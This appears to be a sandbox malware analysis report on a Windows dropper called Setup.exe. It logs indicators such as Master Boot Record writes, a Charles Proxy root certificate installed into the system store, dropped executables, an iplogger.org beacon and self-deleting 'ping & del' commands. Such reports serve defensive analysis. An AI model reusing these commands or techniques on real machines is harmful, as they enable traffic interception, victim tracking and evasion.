010000001cec365f6e4a8d3df23a91ae6144a03aa49592afe15d0da21bd197c03b1338851f783890a1c500f9cd6989258cd8db185b784381cfd5393d150a62ba708875429bb9833ad9214ab2c7f514b37756c7981da05f94027ec7361bb05c8307b617ddb6cfe237a2feff3f4ffe54b1995c4c0ef82c9bbbdbf7239c32e3275d2d3da95f3cdbf7070ffd2a5096a3177c018c6208c03e323083e22a1c53c3f12e72bdd02d85fb2c2079bcfa846506ea3f5f84a13cbbf590c26ede4d6d7170615db9d5ef86fb505c8672dcf59c9145b53db7e52f071171ac61958a1cbd670a3575d427448125fb2bbec5fd81ad6c82d7567c50a77859d21eec7b88153552b1a7a2cd524aa75c1aa904afbfba70b6db0f11d56319f590374b591977da8a758523f8c2f6d51a8ace86ddbec229995972bb8c6ac01763c5c2f628b8f620a503a6318afeb3db4cd337e9f0c2a68744b565ec42100597e81392542b27a7c34c18346b55f629434412764433680c737103d64f98a2d3d63a5dc76e947e29edee004fe0f61ff83c740fa93a673a92ec87b5e3713f3ccbee7a02811a5fcd1b1b702b731d0e16a73216fc9a54cd44bd MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\SharedCookie_MRACMigrationDone = "1" MicrosoftEdge.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD Setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576 Setup.exe -
Runs ping.exe 1 TTPs 3 IoCs
pid Process 3932 PING.EXE 3928 PING.EXE 4160 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3256 1615018414543.exe 3256 1615018414543.exe 2324 1615018419215.exe 2324 1615018419215.exe 2260 1615018424668.exe 2260 1615018424668.exe 652 23E04C4F32EF2158.tmp 652 23E04C4F32EF2158.tmp 2916 seed.exe 2916 seed.exe 2828 Process not Found 2828 Process not Found 2828 Process not Found 2828 Process not Found 2828 Process not Found 2828 Process not Found 2828 Process not Found 2828 Process not Found 2828 Process not Found 2828 Process not Found 2828 Process not Found 2828 Process not Found 2828 Process not Found 2828 Process not Found 2828 Process not Found 2828 Process not Found 2828 Process not Found 2828 Process not Found 2828 Process not Found 2828 Process not Found 2828 Process not Found 2828 Process not Found 2828 Process not Found 2828 Process not Found 2828 Process not Found 2828 Process not Found 2828 Process not Found 2828 Process not Found 2828 Process not Found 2828 Process not Found 2828 Process not Found 2828 Process not Found 2828 Process not Found 2828 Process not Found 2828 Process not Found 2828 Process not Found 2828 Process not Found 2828 Process not Found 2828 Process not Found 2828 Process not Found 2828 Process not Found 2828 Process not Found 2828 Process not Found 2828 Process not Found 2828 Process not Found 2828 Process not Found 2828 Process not Found 2828 Process not Found 2828 Process not Found 2828 Process not Found 2828 Process not Found 2828 Process not Found 2828 Process not Found 2828 Process not Found -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 2224 MicrosoftEdgeCP.exe 2916 seed.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 3924 msiexec.exe Token: SeIncreaseQuotaPrivilege 3924 msiexec.exe Token: SeSecurityPrivilege 4088 msiexec.exe Token: SeCreateTokenPrivilege 3924 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 3924 msiexec.exe Token: SeLockMemoryPrivilege 3924 msiexec.exe Token: SeIncreaseQuotaPrivilege 3924 msiexec.exe Token: SeMachineAccountPrivilege 3924 msiexec.exe Token: SeTcbPrivilege 3924 msiexec.exe Token: SeSecurityPrivilege 3924 msiexec.exe Token: SeTakeOwnershipPrivilege 3924 msiexec.exe Token: SeLoadDriverPrivilege 3924 msiexec.exe Token: SeSystemProfilePrivilege 3924 msiexec.exe Token: SeSystemtimePrivilege 3924 msiexec.exe Token: SeProfSingleProcessPrivilege 3924 msiexec.exe Token: SeIncBasePriorityPrivilege 3924 msiexec.exe Token: SeCreatePagefilePrivilege 3924 msiexec.exe Token: SeCreatePermanentPrivilege 3924 msiexec.exe Token: SeBackupPrivilege 3924 msiexec.exe Token: SeRestorePrivilege 3924 msiexec.exe Token: SeShutdownPrivilege 3924 msiexec.exe Token: SeDebugPrivilege 3924 msiexec.exe Token: SeAuditPrivilege 3924 msiexec.exe Token: SeSystemEnvironmentPrivilege 3924 msiexec.exe Token: SeChangeNotifyPrivilege 3924 msiexec.exe Token: SeRemoteShutdownPrivilege 3924 msiexec.exe Token: SeUndockPrivilege 3924 msiexec.exe Token: SeSyncAgentPrivilege 3924 msiexec.exe Token: SeEnableDelegationPrivilege 3924 msiexec.exe Token: SeManageVolumePrivilege 3924 msiexec.exe Token: SeImpersonatePrivilege 3924 msiexec.exe Token: SeCreateGlobalPrivilege 3924 msiexec.exe Token: SeCreateTokenPrivilege 3924 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 3924 msiexec.exe Token: SeLockMemoryPrivilege 3924 msiexec.exe Token: SeIncreaseQuotaPrivilege 3924 msiexec.exe Token: SeMachineAccountPrivilege 3924 msiexec.exe Token: SeTcbPrivilege 3924 msiexec.exe Token: SeSecurityPrivilege 3924 msiexec.exe Token: SeTakeOwnershipPrivilege 3924 msiexec.exe Token: SeLoadDriverPrivilege 3924 msiexec.exe Token: SeSystemProfilePrivilege 3924 msiexec.exe Token: SeSystemtimePrivilege 3924 msiexec.exe Token: SeProfSingleProcessPrivilege 3924 msiexec.exe Token: SeIncBasePriorityPrivilege 3924 msiexec.exe Token: SeCreatePagefilePrivilege 3924 msiexec.exe Token: SeCreatePermanentPrivilege 3924 msiexec.exe Token: SeBackupPrivilege 3924 msiexec.exe Token: SeRestorePrivilege 3924 msiexec.exe Token: SeShutdownPrivilege 3924 msiexec.exe Token: SeDebugPrivilege 3924 msiexec.exe Token: SeAuditPrivilege 3924 msiexec.exe Token: SeSystemEnvironmentPrivilege 3924 msiexec.exe Token: SeChangeNotifyPrivilege 3924 msiexec.exe Token: SeRemoteShutdownPrivilege 3924 msiexec.exe Token: SeUndockPrivilege 3924 msiexec.exe Token: SeSyncAgentPrivilege 3924 msiexec.exe Token: SeEnableDelegationPrivilege 3924 msiexec.exe Token: SeManageVolumePrivilege 3924 msiexec.exe Token: SeImpersonatePrivilege 3924 msiexec.exe Token: SeCreateGlobalPrivilege 3924 msiexec.exe Token: SeCreateTokenPrivilege 3924 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 3924 msiexec.exe Token: SeLockMemoryPrivilege 3924 msiexec.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 3924 msiexec.exe 652 23E04C4F32EF2158.tmp -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 1864 MicrosoftEdge.exe 2224 MicrosoftEdgeCP.exe 2224 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3084 wrote to memory of 3924 3084 Setup.exe 75 PID 3084 wrote to memory of 3924 3084 Setup.exe 75 PID 3084 wrote to memory of 3924 3084 Setup.exe 75 PID 4088 wrote to memory of 2244 4088 msiexec.exe 78 PID 4088 wrote to memory of 2244 4088 msiexec.exe 78 PID 4088 wrote to memory of 2244 4088 msiexec.exe 78 PID 3084 wrote to memory of 2156 3084 Setup.exe 82 PID 3084 wrote to memory of 2156 3084 Setup.exe 82 PID 3084 wrote to memory of 2156 3084 Setup.exe 82 PID 3084 wrote to memory of 2568 3084 Setup.exe 83 PID 3084 wrote to memory of 2568 3084 Setup.exe 83 PID 3084 wrote to memory of 2568 3084 Setup.exe 83 PID 3084 wrote to memory of 2840 3084 Setup.exe 84 PID 3084 wrote to memory of 2840 3084 Setup.exe 84 PID 3084 wrote to memory of 2840 3084 Setup.exe 84 PID 2840 wrote to memory of 3932 2840 cmd.exe 86 PID 2840 wrote to memory of 3932 2840 cmd.exe 86 PID 2840 wrote to memory of 3932 2840 cmd.exe 86 PID 2156 wrote to memory of 2424 2156 C0CA61A12E4C8B38.exe 87 PID 2156 wrote to memory of 2424 2156 C0CA61A12E4C8B38.exe 87 PID 2156 wrote to memory of 2424 2156 C0CA61A12E4C8B38.exe 87 PID 2156 wrote to memory of 2424 2156 C0CA61A12E4C8B38.exe 87 PID 2156 wrote to memory of 2424 2156 C0CA61A12E4C8B38.exe 87 PID 2156 wrote to memory of 2424 2156 C0CA61A12E4C8B38.exe 87 PID 2568 wrote to memory of 2204 2568 C0CA61A12E4C8B38.exe 88 PID 2568 wrote to memory of 2204 2568 C0CA61A12E4C8B38.exe 88 PID 2568 wrote to memory of 2204 2568 C0CA61A12E4C8B38.exe 88 PID 2204 wrote to memory of 2748 2204 cmd.exe 90 PID 2204 wrote to memory of 2748 2204 cmd.exe 90 PID 2204 wrote to memory of 2748 2204 cmd.exe 90 PID 2156 wrote to memory of 3256 2156 C0CA61A12E4C8B38.exe 91 PID 2156 wrote to memory of 3256 2156 C0CA61A12E4C8B38.exe 91 PID 2156 wrote to memory of 3256 2156 C0CA61A12E4C8B38.exe 91 PID 2568 wrote to memory of 1332 2568 C0CA61A12E4C8B38.exe 92 PID 2568 wrote to memory of 1332 2568 C0CA61A12E4C8B38.exe 92 PID 2568 wrote to memory of 1332 2568 C0CA61A12E4C8B38.exe 92 PID 1332 wrote to memory of 3928 1332 cmd.exe 94 PID 1332 wrote to memory of 3928 1332 cmd.exe 94 PID 1332 wrote to memory of 3928 1332 cmd.exe 94 PID 2156 wrote to memory of 2880 2156 C0CA61A12E4C8B38.exe 95 PID 2156 wrote to memory of 2880 2156 C0CA61A12E4C8B38.exe 95 PID 2156 wrote to memory of 2880 2156 C0CA61A12E4C8B38.exe 95 PID 2156 wrote to memory of 2880 2156 C0CA61A12E4C8B38.exe 95 PID 2156 wrote to memory of 2880 2156 C0CA61A12E4C8B38.exe 95 PID 2156 wrote to memory of 2880 2156 C0CA61A12E4C8B38.exe 95 PID 2156 wrote to memory of 2324 2156 C0CA61A12E4C8B38.exe 96 PID 2156 wrote to memory of 2324 2156 C0CA61A12E4C8B38.exe 96 PID 2156 wrote to memory of 2324 2156 C0CA61A12E4C8B38.exe 96 PID 2156 wrote to memory of 3864 2156 C0CA61A12E4C8B38.exe 97 PID 2156 wrote to memory of 3864 2156 C0CA61A12E4C8B38.exe 97 PID 2156 wrote to memory of 3864 2156 C0CA61A12E4C8B38.exe 97 PID 2156 wrote to memory of 3864 2156 C0CA61A12E4C8B38.exe 97 PID 2156 wrote to memory of 3864 2156 C0CA61A12E4C8B38.exe 97 PID 2156 wrote to memory of 3864 2156 C0CA61A12E4C8B38.exe 97 PID 2156 wrote to memory of 2260 2156 C0CA61A12E4C8B38.exe 98 PID 2156 wrote to memory of 2260 2156 C0CA61A12E4C8B38.exe 98 PID 2156 wrote to memory of 2260 2156 C0CA61A12E4C8B38.exe 98 PID 2156 wrote to memory of 1764 2156 C0CA61A12E4C8B38.exe 99 PID 2156 wrote to memory of 1764 2156 C0CA61A12E4C8B38.exe 99 PID 2156 wrote to memory of 1764 2156 C0CA61A12E4C8B38.exe 99 PID 2156 wrote to memory of 2432 2156 C0CA61A12E4C8B38.exe 100 PID 2156 wrote to memory of 2432 2156 C0CA61A12E4C8B38.exe 100 PID 2156 wrote to memory of 2432 2156 C0CA61A12E4C8B38.exe 100 PID 2156 wrote to memory of 744 2156 C0CA61A12E4C8B38.exe 101
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"1⤵
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:3084 -
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"2⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3924
-
-
C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exeC:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe 0011 installp12⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetThreadContext
- Checks SCSI registry key(s)
- Suspicious use of WriteProcessMemory
PID:2156 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"3⤵PID:2424
-
-
C:\Users\Admin\AppData\Roaming\1615018414543.exe"C:\Users\Admin\AppData\Roaming\1615018414543.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615018414543.txt"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3256
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"3⤵PID:2880
-
-
C:\Users\Admin\AppData\Roaming\1615018419215.exe"C:\Users\Admin\AppData\Roaming\1615018419215.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615018419215.txt"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2324
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"3⤵PID:3864
-
-
C:\Users\Admin\AppData\Roaming\1615018424668.exe"C:\Users\Admin\AppData\Roaming\1615018424668.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615018424668.txt"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2260
-
-
C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exeC:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"3⤵
- Executes dropped EXE
PID:1764
-
-
C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP3⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
PID:2432
-
-
C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exeC:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe /silent3⤵
- Executes dropped EXE
PID:744 -
C:\Users\Admin\AppData\Local\Temp\is-61UF8.tmp\23E04C4F32EF2158.tmp"C:\Users\Admin\AppData\Local\Temp\is-61UF8.tmp\23E04C4F32EF2158.tmp" /SL5="$60192,762308,115712,C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe" /silent4⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:652 -
C:\Program Files (x86)\DTS\seed.sfx.exe"C:\Program Files (x86)\DTS\seed.sfx.exe" -pX7mdks39WE0 -s15⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:3132 -
C:\Program Files (x86)\Seed Trade\Seed\seed.exe"C:\Program Files (x86)\Seed Trade\Seed\seed.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2916
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/14Zhe7"5⤵
- Checks computer location settings
PID:976
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe"3⤵PID:4100
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 34⤵
- Runs ping.exe
PID:4160
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exeC:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe 200 installp12⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Checks SCSI registry key(s)
- Suspicious use of WriteProcessMemory
PID:2568 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe3⤵
- Suspicious use of WriteProcessMemory
PID:2204 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe4⤵
- Kills process with taskkill
PID:2748
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:1332 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 34⤵
- Runs ping.exe
PID:3928
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\Setup.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2840 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 33⤵
- Runs ping.exe
PID:3932
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4088 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 53F05FB0DC6D7957A0EDD309300C0B98 C2⤵
- Loads dropped DLL
PID:2244
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1864
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:2292
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:2224
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
PID:2444
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:4500